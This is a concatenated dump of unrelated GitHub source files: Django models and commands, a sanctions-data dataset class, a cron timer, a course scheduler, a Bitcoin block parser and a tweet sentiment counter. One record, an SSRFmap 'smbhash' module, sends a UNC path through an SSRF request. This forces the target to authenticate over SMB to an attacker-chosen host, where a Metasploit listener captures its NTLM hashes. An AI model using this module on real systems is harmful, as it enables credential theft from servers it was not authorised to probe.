return self.stdout.write(\n            self.style.WARNING(warning)\n        )\n\n    def error(self, error):\n        return self.stdout.write(\n            self.style.ERROR(error)\n        )\n\n    def handle(self, *args, **options):\n        self.warning(\n            'if something goes wrong after fixtures installations,\\\n            please use: python manage.py flush.'\n        )\n\n        with transaction.atomic():\n            \"\"\"create categories\"\"\"\n            category_one = CategoryCampaing.objects.create(\n                name='Art',\n                slug='art'\n            )\n            category_two = CategoryCampaing.objects.create(\n                name='Technology',\n                slug='technology'\n            )\n            self.success('categories created.')\n","repo_name":"ngelrojas/cotizate-back","sub_path":"apiuser/core/management/commands/dbcategories.py","file_name":"dbcategories.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"27234283277","text":"from pathlib import Path\nfrom banal import as_bool\nfrom normality import slugify\nfrom datetime import datetime\nfrom typing import Dict, Optional, Any\nfrom nomenklatura.dataset import Dataset as NKDataset\nfrom nomenklatura.dataset import DataCatalog\nfrom nomenklatura.dataset.util import type_check, type_require\nfrom nomenklatura.util import iso_to_version, datetime_iso\nfrom followthemoney.types import registry\nfrom followthemoney.namespace import Namespace\n\nfrom yente.logs import get_logger\n\nlog = 
get_logger(__name__)\nBOOT_TIME = datetime_iso(datetime.utcnow())\n\n\nclass Dataset(NKDataset):\n def __init__(self, catalog: DataCatalog[\"Dataset\"], data: Dict[str, Any]):\n name = data[\"name\"]\n norm_name = slugify(name, sep=\"_\")\n if name != norm_name:\n raise ValueError(\"Invalid dataset name %r (try: %r)\" % (name, norm_name))\n super().__init__(catalog, data)\n\n if self.version is None:\n ts = data.get(\"last_export\", BOOT_TIME)\n self.version = iso_to_version(ts) or \"static\"\n\n self.load = as_bool(data.get(\"load\"), True)\n self.entities_url = self._get_entities_url(data)\n namespace = as_bool(data.get(\"namespace\"), False)\n self.ns = Namespace(self.name) if namespace else None\n\n def _get_entities_url(self, data: Dict[str, Any]) -> Optional[str]:\n if \"entities_url\" in data:\n return type_require(registry.url, data.get(\"entities_url\"))\n path = type_check(registry.string, data.get(\"path\"))\n if path is not None:\n return Path(path).resolve().as_uri()\n resource_name = type_check(registry.string, data.get(\"resource_name\"))\n resource_type = type_check(registry.string, data.get(\"resource_type\"))\n for resource in self.resources:\n if resource.url is None:\n continue\n if resource_name is not None and resource.name == resource_name:\n return resource.url\n if resource_type is not None and resource.mime_type == resource_type:\n return resource.url\n return None\n\n def to_dict(self) -> Dict[str, Any]:\n data = super().to_dict()\n data[\"load\"] = self.load\n data[\"entities_url\"] = self.entities_url\n data[\"namespace\"] = self.ns is not None\n if \"children\" not in data:\n data[\"children\"] = [c.name for c in self.children]\n return data\n","repo_name":"opensanctions/yente","sub_path":"yente/data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"86"} +{"seq_id":"14438526186","text":"from core.utils import *\nimport logging\n\n# NOTE\n# Use auxiliary/server/capture/smb from Metasploit to setup a listener\n\nname = \"smbhash\"\ndescription = \"Force an SMB authentication attempt by embedding a UNC path (\\\\SERVER\\SHARE) \"\nauthor = \"Swissky\"\ndocumentation = []\n\nclass exploit():\n UNC_EXAMPLE = \"\\\\\\\\192.168.1.2\\\\SSRFmap\"\n UNC_IP = \"192.168.1.2\"\n UNC_FILE = \"SSRFmap\"\n\n def __init__(self, requester, args):\n logging.info(f\"Module '{name}' launched !\")\n\n UNC_IP = input(\"UNC IP (default: 192.168.1.2): \")\n if UNC_IP != '':\n self.UNC_IP = UNC_IP\n\n UNC_FILE = input(\"UNC File (default: SSRFmap): \")\n if UNC_FILE != '':\n self.UNC_FILE = UNC_FILE\n \n payload = wrapper_unc(self.UNC_FILE, self.UNC_IP)\n r = requester.do_request(args.param, payload)\n logging.info(f\"\\033[32mSending UNC Path\\033[0m : {payload}\")\n","repo_name":"swisskyrepo/SSRFmap","sub_path":"modules/smbhash.py","file_name":"smbhash.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":2531,"dataset":"github-code","pt":"86"} +{"seq_id":"1355294242","text":"from uuid import uuid4\nimport os\nfrom django.core.validators import RegexValidator\nfrom django.contrib.auth.models import User\nfrom django.db import models\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\n\nCATEGORY = [\n (u'0', u'House'),\n (u'1', u'Apartment'),\n (u'2', u'Duplex'),\n (u'3', u'Villa'),\n]\n\nCITY = [\n (u\"1\", \"Tehran\"),\n]\n\nURBANAREANUMBER = [\n (u'1', u'1'),\n (u'2', 
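# wrapper_unc() comes from SSRFmap's core.utils and is not included in this dump;
# judging from the UNC_EXAMPLE constant above, its effect is roughly this sketch:
def wrapper_unc(filename, ip):
    return '\\\\%s\\%s' % (ip, filename)

print(wrapper_unc('SSRFmap', '192.168.1.2'))   # -> \\192.168.1.2\SSRFmap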
u'2'),\n (u'3', u'3'),\n (u'4', u'4'),\n (u'5', u'5'),\n (u'6', u'6'),\n (u'7', u'7'),\n (u'8', u'8'),\n (u'9', u'9'),\n (u'10', u'10'),\n (u'11', u'11'),\n (u'12', u'12'),\n (u'13', u'13'),\n (u'14', u'14'),\n (u'15', u'15'),\n (u'16', u'16'),\n (u'17', u'17'),\n (u'18', u'18'),\n (u'19', u'19'),\n (u'20', u'20'),\n (u'21', u'21'),\n (u'22', u'22'),\n]\n\nGENERAL = u\"0\"\nDESIRED = u\"1\"\nPOWER = [\n (GENERAL, u\"general\"),\n (DESIRED, u\"desired\"),\n]\n\nPOPULARITY = [\n (u\"1\", u\"1\"),\n (u\"2\", u\"2\"),\n (u\"3\", u\"3\"),\n (u\"4\", u\"4\"),\n (u\"5\", u\"5\"),\n]\n\nphone_regex = RegexValidator(\n regex=r'^\\+?1?\\d{9,15}$',\n message=\"Phone number must be entered in the format: '09226255415'. Up to 15 digits allowed.\"\n)\n\n\ndef get_image_path(instance, filename):\n id = uuid4()\n return os.path.join('Images', str(id), filename)\n\n\nclass Agencies(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE, blank=True,null=True)\n special = models.BooleanField(\n default=False,\n verbose_name='کاربر ویژه',\n )\n skill = models.CharField(\n max_length=100,\n verbose_name = \"حوزه فعالیت\",\n blank=True,\n null=True,\n )\n urban_area_number = models.CharField(\n max_length=2,\n choices=URBANAREANUMBER,\n verbose_name='شماره منطقه',\n )\n address = models.CharField(\n max_length=300,\n verbose_name=\"ادرس\",\n )\n city = models.CharField(\n max_length=1,\n choices=CITY,\n verbose_name=\"شهر\",\n )\n popularity = models.CharField(\n max_length=1,\n choices=POPULARITY,\n verbose_name=\"محبوبیت\",\n default=u\"5\",\n )\n created = models.DateTimeField(\n auto_now_add=True,\n verbose_name=\"تاریخ ساخت اکانت\",\n )\n updated = models.DateTimeField(\n auto_now=True,\n verbose_name=\"اخرین به روز رسانی\",\n )\n phone_number = models.CharField(\n validators=[phone_regex],\n max_length=17,\n blank=True,\n null=True,\n unique=True,\n verbose_name=\"شماره موبایل\",\n )\n code_number = models.CharField(\n max_length=100,\n verbose_name = \"شناسه صنفی \",\n blank=True,\n null=True,\n )\n web_site = models.URLField(\n verbose_name=\"وب سایت\",\n blank=True,\n null=True,\n )\n instagram = models.URLField(\n verbose_name=\"ادرس اینستاگرام\",\n blank=True,\n null=True,\n )\n about_me = models.CharField(\n max_length=100,\n blank=True,\n null=True,\n verbose_name=\"معرفی\",\n )\n long_description = models.CharField(\n max_length=1000,\n blank=True,\n null=True,\n verbose_name=\"معرفی جامع\",\n )\n image = models.ImageField(\n upload_to=get_image_path,\n blank=True,\n null=True,\n verbose_name=\"تصویر آژانس\",\n )\n image_owner = models.ImageField(\n upload_to=get_image_path,\n blank=True,\n null=True,\n verbose_name=\"تصویر مدیران و همکاران\",\n )\n agencies = models.BooleanField(\n default=False,\n )\n\n\n def __str__(self):\n return self.user.username\n\n\n@receiver(post_save, sender=User)\ndef update_agencies_profile(sender, instance, created, **kwargs):\n if created:\n Agencies.objects.create(user=instance)\n instance.agencies.save()\n","repo_name":"pd-Shah/realestate","sub_path":"agencies/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"86"} +{"seq_id":"32754082577","text":"\"\"\"\nATask Manager\n\"\"\"\n\nimport logging\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass RegisteringTwice(AttributeError):\n \"\"\"Error registering the same name twice\"\"\"\n pass\n\n\nclass RegistryItem(object):\n \"\"\"Item of the registry\"\"\"\n def __init__(self, 
**options):\n \"\"\"Copies all options to it's own instance dict\"\"\"\n self.__dict__ = {\n **options\n }\n\n def update(self, other):\n \"\"\"Equal to dict method\"\"\"\n self.__dict__.update(other.__dict__)\n\n def __eq__(self, other):\n \"\"\"Equal to dict method\"\"\"\n if other is None:\n return False\n if isinstance(other, dict):\n return self.__dict__ == other\n return self.__dict__ == other.__dict__\n\n\nclass Manager(object):\n \"\"\"The registry manager\"\"\"\n\n def __init__(self, name, unite=True):\n \"\"\"\n Constructor\n\n :param namespace: name of the registry namespace\n :type namespace: str\n :param unite: unite registered items with the same name.\n If unite=False, raises RegisteringTwice when\n using the same name.\n \"\"\"\n self._name = name\n self._unite = unite\n self._registry = {}\n\n def register(self, name, **options):\n \"\"\"\n Register an item\n\n :param name: name of the item\n :type name: str\n :param options: options to register\n :type options: dict\n \"\"\"\n item = RegistryItem(**options)\n old = self._registry.get(name, None)\n if old:\n if self._unite:\n old.update(item)\n return\n raise RegisteringTwice(\"Registering twice in %s: %s\" % (self._name, name))\n self._registry[name] = item\n\n def unregister(self, name):\n \"\"\"\n Unregister the item\n\n :param name: name of the item\n :type name: str\n \"\"\"\n logger.debug('unregistering from %s: %s', self._name, name)\n del self._registry[name]\n\n def get(self, name):\n \"\"\"\n Get a register item by name\n\n :param name: name of the item\n :type name: str\n :returns: Item of the registry or default value\n :rtype: RegistryItem\n \"\"\"\n ret = self._registry.get(name, None)\n if not ret and self._unite:\n ret = RegistryItem()\n self._registry[name] = ret\n return ret\n","repo_name":"nnseva/atasks","sub_path":"atasks/registry.py","file_name":"registry.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"15551884966","text":"import os\npath=input(\"enter the path to list the directories and files: \")\nfod=os.listdir(path)\nfor each in fod:\n \n x=(os.path.join(path,each))\n if os.path.isfile(x):\n print(f\"{x} is a file\")\n else:\n print(f\"{x} is a directory\")\n \n","repo_name":"tarakrrr/cloudops","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"73080706523","text":"# STL\nfrom typing import Tuple, Union, Generator\nfrom datetime import datetime, timedelta\n\n# PDM\nfrom croniter import croniter\nfrom dateutil.tz import gettz, tzstr, tzfile, tzlocal\nfrom pytimeparse import parse as timeparse\n\n# LOCAL\nfrom tenpo.log_utils import getLogger\n\nValidTZ = tzlocal | tzfile | tzstr\n\nLOG = getLogger()\n\n\nclass InvalidEventTimer(Exception):\n def __init__(self, *args: object) -> None:\n super().__init__(*args)\n\n\nclass InvalidCron(InvalidEventTimer):\n def __init__(self, cron: str) -> None:\n super().__init__(\"open tenpo li pakala: `%s`\" % cron)\n\n\nclass InvalidTZ(InvalidEventTimer):\n def __init__(self, timezone: str) -> None:\n super().__init__(\"nasin tenpo li pakala: `%s`\" % timezone)\n\n\nclass InvalidDelta(InvalidEventTimer):\n def __init__(self, delta: str) -> None:\n super().__init__(\"suli tenpo li pakala: `%s`\" % delta)\n\n\nclass EventTimer:\n __tz: ValidTZ\n __cron: croniter\n __delta: timedelta\n\n def __init__(self, cron_str: 
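# A brief usage sketch of the Manager registry above (the name and options are
# invented). With unite=True a second register() call merges its options into the
# existing item instead of raising RegisteringTwice:
manager = Manager('handlers', unite=True)
manager.register('on_save', callback=print, priority=1)
manager.register('on_save', priority=2)    # merged into the existing item
item = manager.get('on_save')
print(item.priority)                       # -> 2, while callback is kept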
str, tz_str: str, delta_str: str):\n if not tz_str:\n raise InvalidTZ(tz_str)\n if not cron_str:\n raise InvalidCron(cron_str)\n if not delta_str:\n raise InvalidDelta(delta_str)\n\n tz = gettz(tz_str)\n if not isinstance(tz, ValidTZ):\n raise InvalidTZ(tz_str)\n self.__tz = tz\n\n if not croniter.is_valid(cron_str):\n raise InvalidCron(cron_str)\n self.__cron = croniter(cron_str, datetime.now(tz))\n\n delta = timeparse(delta_str, granularity=\"minutes\")\n if not isinstance(delta, int):\n raise InvalidDelta(delta_str)\n self.__delta = timedelta(seconds=delta)\n\n def __normalize_to_now(self) -> datetime:\n \"\"\"\n Set current croniter to use `datetime.now` with the configured timezone.\n Return the created datetime.\n \"\"\"\n now = datetime.now(tz=self.__tz)\n self.__cron.set_current(start_time=now)\n return now\n\n def now_in_range(self):\n now = self.__normalize_to_now()\n last = self.__cron.get_prev(datetime)\n # LOG.debug(\"%s %s %s\", now, last, last + self.__delta)\n\n return last <= now < (last + self.__delta)\n\n def get_starts(self, n: int = 3) -> Generator[datetime, None, None]:\n self.__normalize_to_now()\n for _ in range(n):\n yield self.__cron.get_next(datetime)\n\n def get_ranges(\n self, n: int = 3\n ) -> Generator[Tuple[datetime, datetime], None, None]:\n self.__normalize_to_now()\n for _ in range(n):\n nxt = self.__cron.get_next(datetime)\n yield (nxt, nxt + self.__delta)\n","repo_name":"gregdan3/ilo-pi-toki-pona-taso","sub_path":"src/tenpo/croniter_utils.py","file_name":"croniter_utils.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"10296119872","text":"from pyconstraints import is_nil\n\nfrom courses.utils import DAYS, sorted_daysofweek\n\nfrom scheduler.scheduling import compute_schedules as _compute_schedules\n\n\nclass ConflictCache(object):\n _EMPTY_SET = frozenset()\n\n def __init__(self, conflict_mapping):\n self.conflict_mapping = conflict_mapping\n\n def __repr__(self):\n return \"\" % self.conflict_mapping\n\n def __key__(self, section_id):\n return self.conflict_mapping.get(section_id, self._EMPTY_SET)\n\n def __call__(self, section1, section2):\n if is_nil(section1) or is_nil(section2):\n return True\n self.section_conflicts(section1.id, section2.id)\n\n def section_conflicts(self, section1_id, section2_id):\n return (\n section2_id in self[section1_id] or\n section1_id in self[section2_id]\n )\n\n\ndef has_schedule(selected_courses, section_constraint=None):\n schedules = _compute_schedules(\n selected_courses,\n free_sections_only=False,\n generator=True,\n section_constraint=section_constraint)\n for schedule in schedules:\n return True\n return False\n\n\ndef compute_schedules(selected_courses, section_constraint=None):\n \"\"\"Returns the schedules in a JSON-friendly format.\n\n Returns a list of dictionary of course id to crns.\n \"\"\"\n schedules = _compute_schedules(\n selected_courses,\n free_sections_only=False\n )\n results = []\n for schedule in schedules:\n s = {}\n for course, section in schedule.items():\n s[str(course.id)] = section.id\n results.append(s)\n return results\n\n\ndef period_stats(periods):\n if len(periods) < 1:\n return range(8, 20), DAYS[:5]\n min_time, max_time, dow_used = None, None, set()\n for period in periods:\n min_time = min(min_time or period.start, period.start)\n max_time = max(max_time or period.end, period.end)\n dow_used = dow_used.union(period.days_of_week)\n\n timerange = range(min_time.hour - 1, 
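# A hypothetical usage sketch of EventTimer above (the cron expression, timezone and
# delta values are invented): a daily 09:00 event that stays "in range" for 30 minutes.
timer = EventTimer('0 9 * * *', 'America/Chicago', '30m')
print(timer.now_in_range())
for start, end in timer.get_ranges(2):
    print(start, '->', end)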
max_time.hour + 2)\n    return list(timerange), sorted_daysofweek(dow_used)\n","repo_name":"jeffh/YACS","sub_path":"scheduler/domain.py","file_name":"domain.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"86"} +{"seq_id":"41590864327","text":"import argparse\nimport asyncio\nimport configparser\nimport logging\nimport signal\nimport sys\nimport traceback\nfrom setproctitle import setproctitle\nimport time\nimport asyncpg\nimport colorlog\nimport pybtc\nimport db_model\nfrom collections import deque\nfrom struct import pack, unpack\nfrom pybtc import int_to_c_int, var_int_to_int, parse_script, int_to_var_int, read_var_int\nfrom pybtc import double_sha256\nfrom math import ceil\nimport uvloop\nasyncio.set_event_loop_policy(uvloop.EventLoopPolicy())\n\n\n\ndef read_c_int(stream, base_bytes=1):\n    \"\"\"\n    Read the bytes of a compressed integer from a stream\n\n    :param stream: stream to read the compressed integer bytes from.\n    :param base_bytes: number of base bytes from which compression starts.\n    :return: compressed integer bytes.\n    \"\"\"\n    b = bytearray(stream.read(1))\n    byte_length = f = 0\n    while True:\n        v = b[f]\n        if v == 0xff:\n            byte_length += 8\n            f += 1\n            b += stream.read(1)\n            continue\n        while v & 0b10000000:\n            byte_length += 1\n            v = v << 1\n        break\n    b += stream.read(byte_length+base_bytes - f)\n    return b\n\n\nclass Transaction(dict):\n    \"\"\"\n    The class for Transaction object\n\n    :param raw_tx: (optional) raw transaction in bytes or HEX encoded string; if no raw transaction is\n                   provided, a new empty transaction template will be created.\n    :param format: \"raw\" or \"decoded\" format. Raw format means that the whole transaction is represented in bytes\n                   for best performance.\n                   A decoded transaction is represented in human readable format using base58, hex, bech32,\n                   asm and opcodes. 
By default \"decoded\" format using.\n :param int version: transaction version for new template, by default 1.\n :param int lock_time: transaction lock time for new template, by default 0.\n :param boolean testnet: address type for \"decoded\" transaction representation.\n\n \"\"\"\n\n def __init__(self, raw_tx=None, format=\"decoded\", version=1,\n lock_time=0, testnet=False, auto_commit=True, keep_raw_tx=False, c_int=False):\n if format not in (\"decoded\", \"raw\"):\n raise ValueError(\"format error, raw or decoded allowed\")\n self.auto_commit = auto_commit\n self[\"format\"] = format\n self[\"testnet\"] = testnet\n self[\"segwit\"] = False\n self[\"txId\"] = None\n self[\"hash\"] = None\n self[\"version\"] = version\n self[\"size\"] = 0\n self[\"vSize\"] = 0\n self[\"bSize\"] = 0\n self[\"lockTime\"] = lock_time\n self[\"vIn\"] = dict()\n self[\"vOut\"] = dict()\n self[\"rawTx\"] = None\n self[\"blockHash\"] = None\n self[\"confirmations\"] = None\n self[\"time\"] = None\n self[\"blockTime\"] = None\n self[\"blockIndex\"] = None\n self[\"coinbase\"] = False\n self[\"fee\"] = None\n self[\"data\"] = None\n self[\"amount\"] = None\n if raw_tx is None:\n return\n\n self[\"rawTx\"] = deque()\n rtx = self[\"rawTx\"].append\n self[\"amount\"] = 0\n sw = sw_len = 0\n stream = self.get_stream(raw_tx)\n start = stream.tell()\n read = stream.read\n tell = stream.tell\n if not c_int:\n # start deserialization\n t = read(4)\n rtx(t)\n self[\"version\"] = unpack(' %s %% \" % (self.timeline_size_v_int - self.timeline_size_c_int,\n round((self.timeline_size_v_int - self.timeline_size_c_int)\n / self.timeline_size_v_int * 100, 2)))\n print(len(self.block_batch))\n\n\n async def commit(self):\n batch = None\n while True:\n if batch is None:\n batch = deque(self.block_batch)\n self.block_batch = deque()\n if batch:\n async with self.db_pool.acquire() as conn:\n async with conn.transaction():\n\n await conn.copy_records_to_table('blocks',\n columns=[\"height\", \"timestamp\",\n \"size_c_int\", \"timeline_size_c_int\",\n \"size_v_int\", \"timeline_size_v_int\"],\n records=batch)\n else:\n await asyncio.sleep(1)\n batch = None\n\n\n\n async def orphan_block_handler(self, orphan_height):\n pass\n\n\n async def new_block_handler(self, block, conn):\n pass\n\n\n\n async def new_transaction_handler(self, tx, timestamp, conn):\n pass\n\n\n\n def _exc(self, a, b, c):\n return\n\n\n def terminate(self, a, b):\n if not self.shutdown:\n self.shutdown = True\n self.loop.create_task(self.terminate_coroutine())\n else:\n self.log.critical(\"Shutdown in progress please wait ...\")\n\n\n async def terminate_coroutine(self):\n sys.excepthook = self._exc\n self.log.error('Stop request received')\n if self.connector:\n self.log.warning(\"Stop node connector\")\n await self.connector.stop()\n\n self.log.warning('sync worker stop request received')\n [process.terminate() for process in self.processes]\n [task.cancel() for task in self.tasks]\n if self.tasks: await asyncio.wait(self.tasks)\n\n try: await self.db_pool.close()\n except: pass\n\n self.log.info(\"server stopped\")\n self.loop.stop()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"bitcoin compressed int chart v 0.0.1\")\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\"-c\", \"--config\", help = \"config file\", type=str, nargs=1, metavar=('PATH',))\n parser.add_argument(\"-v\", \"--verbose\", help=\"increase output verbosity\", action=\"count\", default=0)\n parser.add_argument(\"-w\", \"--connector\", 
help=\"increase output verbosity for connector\",\n action=\"count\",\n default=0)\n args = parser.parse_args()\n config_file = \"../config/bitcoin-compressed-int-chart.conf\"\n log_level = logging.WARNING\n logger = logging.getLogger(\"server\")\n logger_connector = logging.getLogger(\"connector\")\n if args.config is not None:\n config_file = args.config[0]\n config = configparser.ConfigParser()\n config.read(config_file)\n if args.verbose > 0:\n log_level = logging.INFO\n if args.verbose > 1:\n log_level = logging.DEBUG\n\n connector_log_level = logging.INFO\n if args.connector > 0:\n connector_log_level = logging.WARNING\n if args.connector > 1:\n connector_log_level = logging.INFO\n if args.connector > 2:\n connector_log_level = logging.DEBUG\n\n ch = logging.StreamHandler()\n formatter = colorlog.ColoredFormatter('%(log_color) s%(asctime)s: %(message)s')\n formatter = colorlog.ColoredFormatter(\n '%(log_color)s%(asctime)s %(levelname)s: %(message)s (%(module)s:%(lineno)d)')\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n logger_connector.addHandler(ch)\n\n\n # check config\n try:\n config[\"CONNECTOR\"][\"zeromq\"]\n config[\"CONNECTOR\"][\"rpc\"]\n config[\"POSTGRESQL\"][\"dsn\"]\n config[\"POSTGRESQL\"][\"pool_threads\"]\n try:\n connector_log_level = log_level_map[config[\"CONNECTOR\"][\"log_level\"]]\n except:\n pass\n\n try:\n log_level = log_level_map[config[\"SERVER\"][\"log_level\"]]\n except:\n pass\n\n except Exception as err:\n logger.critical(\"Configuration failed: %s\" % err)\n logger.critical(\"Shutdown\")\n logger.critical(str(traceback.format_exc()))\n sys.exit(0)\n connector_log_level = logging.DEBUG\n log_level = logging.DEBUG\n logger.setLevel(log_level)\n logger_connector.setLevel(connector_log_level)\n loop = asyncio.get_event_loop()\n app = App(loop, logger, logger_connector, config)\n loop.run_forever()\n\n pending = asyncio.Task.all_tasks()\n for task in pending:\n task.cancel()\n if pending:\n loop.run_until_complete(asyncio.wait(pending))\n loop.close()\n\n","repo_name":"bitaps-com/bitcoin-compressed-int-chart","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":21031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"7476725429","text":"import codecs\nimport numpy\nimport math\n\n# This program takes a file of parsed tweets (output of ExtractTweetData.py),\n# identifies the locales (cities) represented in the data, and, for each locale,\n# counts the frequency and average message sentiment score for each term (word)\n# included in an input list (e.g., \"EducationTerms.txt\").\n#\n# The output is given as a set of large tables, showing the statistics for each\n# term of interest in each locale.\n#\n# How to fill an array with zeroes from: http://stackoverflow.com/questions/4056768/how-to-declare-array-of-zeros-in-python-or-an-array-of-a-certain-size\n# Python readlines error with unicode and a workaround from: http://bugs.python.org/issue15278\n\nextractedTweets = \"\"\nqueryTerms = \"EducationTerms.txt\" # Input terms (words)\n # whose incidence you wish to calculate\n\n## Calculates counts and basic statistics for the terms of interest included\n## in the query, in the different locations indicated in the input list of\n## locales.\n\ndef countQueryInstances (parsedTweetsFile, queryTermsArray, theLocalesArray):\n\n queryCounts = []\n queryScores = []\n numTweets = []\n scoreTweets = []\n indivTweets = []\n indivScores = []\n stdevArray = []\n stderrArray = 
[]\n stdevOverall = []\n stderrOverall = []\n \n for i in range(0,len(theLocalesArray)):\n queryCounts.append([0] * len(queryTermsArray)) # Number of tweets where query term is found\n queryScores.append([0.0] * len(queryTermsArray)) # Composite score of tweets where query term is found\n indivScores.append([0] * len(queryTermsArray))\n stdevArray.append([0.0]*len(queryTermsArray))\n stderrArray.append([0.0]*len(queryTermsArray))\n numTweets.append(0) # Total number of tweets\n scoreTweets.append(0.0) # Composite score of all tweets\n indivTweets.append(0.0)\n stdevOverall.append(0.0)\n stderrOverall.append(0.0)\n\n for i in range(0,len(theLocalesArray)):\n indivTweets[i] = []\n for j in range(0,len(queryTermsArray)):\n indivScores[i][j] = []\n\n counter = 0\n \n for line in parsedTweetsFile:\n \n try:\n line = line.decode(encoding = \"utf-8\")\n lineArray = line.split(\"\\t\") # Input file is preprocessed to remove\n \n if lineArray[11] in theLocalesArray:\n\n index = theLocalesArray.index(lineArray[11])\n \n messageList = lineArray[2].split() # any tabs or newlines in the messages\n \n alreadyFoundFlags = [False] * len(queryTermsArray) # Flags to ensure that messages\n # having the same term twice are not\n # double-counted\n \n for i in range(0, len(messageList)): # For each word in the message...\n messageList[i] = messageList[i].strip(\".!?-~@$#%^&*(){}[]\\|:;,`+=_/\")\n ngram = messageList[i].encode(\"ascii\",\"ignore\")\n ngram = ngram.lower()\n \n for j in range(0,len(queryTermsArray)): # Check each term in the query list to see if it matches the focal word\n if alreadyFoundFlags[j] == False: # If the query term has already been found in this message, don't check again\n if ngram == queryTermsArray[j]:\n queryCounts[index][j] += 1\n queryScores[index][j] += int(lineArray[-1]) # Get the affect score of the message\n alreadyFoundFlags[j] = True\n indivScores[index][j].append(float(int(lineArray[-1]))) \n numTweets[index] += 1\n scoreTweets[index] += int(lineArray[-1])\n indivTweets[index].append(float(int(lineArray[-1])))\n except UnicodeEncodeError:\n print(\"UnicodeEncodeError\")\n print(repr(line))\n print(lineArray[-1])\n print(str(len(lineArray)))\n break\n except ValueError:\n print(\"ValueError\")\n print(repr(line))\n print(lineArray[-1])\n print(str(len(lineArray)))\n\n for i in range(0,len(theLocalesArray)):\n stdevOverall[i] = numpy.std(numpy.array(indivTweets[i]))\n stderrOverall[i] = stdevOverall[i]/math.sqrt(float(numTweets[i]))\n for j in range(0,len(queryTermsArray)):\n stdevArray[i][j] = numpy.std(numpy.array(indivScores[i][j]))\n stderrArray[i][j] = stdevArray[i][j]/math.sqrt(float(queryCounts[i][j]))\n \n return queryCounts, queryScores, numTweets, scoreTweets, stdevArray, stderrArray, stdevOverall, stderrOverall\n\n## Identify all the locales in the input tweet file and make a list of them\n## for subsequent use.\n\ndef populateLocales(tweetFileName):\n\n myLocalesArray = []\n tweetFile = open(tweetFileName, mode = \"rU\")\n \n for line in tweetFile:\n line = line.decode(encoding = \"utf-8\")\n lineArray = line.split(\"\\t\")\n\n if lineArray[10] == \"city\" and lineArray[12].split()[-1] == \"CA\":\n if lineArray[11] not in myLocalesArray:\n myLocalesArray.append(lineArray[11].encode(\"ascii\",\"ignore\"))\n\n tweetFile.close()\n\n return myLocalesArray\n \n \ndef main():\n\n queryArray = []\n\n queryFile = open(queryTerms, mode = \"rU\")\n\n # Read query terms into array\n \n for line in queryFile:\n queryArray.append(line.strip())\n\n queryFile.close()\n \n 
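# Illustrative sketch (added; the two terms are hypothetical): if\n    # EducationTerms.txt contained the lines \"school\" and \"teacher\", then after\n    # the strip() above, queryArray == [\"school\", \"teacher\"].\n    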
localesArray = populateLocales(extractedTweets)\n\n #localesArray = [\"Oakland\", \"Palo Alto\", \"East Palo Alto\", \"San Francisco\", \"San Jose\",\"Menlo Park\"]\n\n # Open file of parsed tweets as utf-8. I've taken care to preserve the\n # utf-8 encoding so that emoticons and foreign characters can be recovered,\n # though the current implementation does not take advantage of this\n # (hopefully will in the future).\n\n tweetsFile = open(extractedTweets, mode = \"rU\")\n \n queryCounts, queryScores, totalTweets, totalScores, stdevs, stderrs, stdevO, stderrO = countQueryInstances(tweetsFile, queryArray, localesArray)\n\n overallAverageScores = []\n\n for i in range(0,len(localesArray)):\n\n if (totalTweets[i] > 0):\n overallAverageScores.append(totalScores[i]/float(totalTweets[i]))\n else:\n overallAverageScores.append(\"undef\")\n print(\"Place with zero tweets: \" + localesArray[i])\n\n # Write the output to a file in tabular format\n\n outFileName = extractedTweets[0:-4] + \"_results_full.txt\"\n\n outFile = open(outFileName, mode = \"w\")\n\n outFile.write(\"OVERALL\\n\")\n outFile.write(\"Metric\\t\")\n\n for i in range(0,len(localesArray)):\n outFile.write(localesArray[i] + \"\\t\")\n\n outFile.write(\"\\n\")\n outFile.write(\"Total tweets\\t\")\n\n for i in range(0,len(localesArray)):\n outFile.write(str(totalTweets[i]) + \"\\t\") \n\n outFile.write(\"\\n\")\n outFile.write(\"Aggregate score\\t\")\n\n for i in range(0,len(localesArray)):\n outFile.write(str(totalScores[i]) + \"\\t\")\n\n outFile.write(\"\\n\")\n outFile.write(\"Average score\\t\")\n\n for i in range(0,len(localesArray)):\n outFile.write(str(overallAverageScores[i]) + \"\\t\")\n\n outFile.write(\"\\n\")\n outFile.write(\"Stdev\\t\")\n\n for i in range(0,len(localesArray)):\n outFile.write(str(stdevO[i]) + \"\\t\")\n\n outFile.write(\"\\n\")\n outFile.write(\"Std err\\t\")\n\n for i in range(0,len(localesArray)):\n outFile.write(str(stderrO[i]) + \"\\t\")\n\n outFile.write(\"\\n\\n\")\n outFile.write(\"COUNT\\n\")\n outFile.write(\"Term\\t\")\n\n for i in range(0,len(localesArray)):\n outFile.write(localesArray[i] + \"\\t\")\n\n outFile.write(\"\\n\")\n\n for i in range(0,len(queryArray)):\n outFile.write(queryArray[i] + \"\\t\")\n for j in range(0,len(localesArray)):\n outFile.write(str(queryCounts[j][i]) + \"\\t\")\n outFile.write(\"\\n\")\n\n outFile.write(\"\\n\\n\")\n outFile.write(\"FREQUENCY\\n\")\n 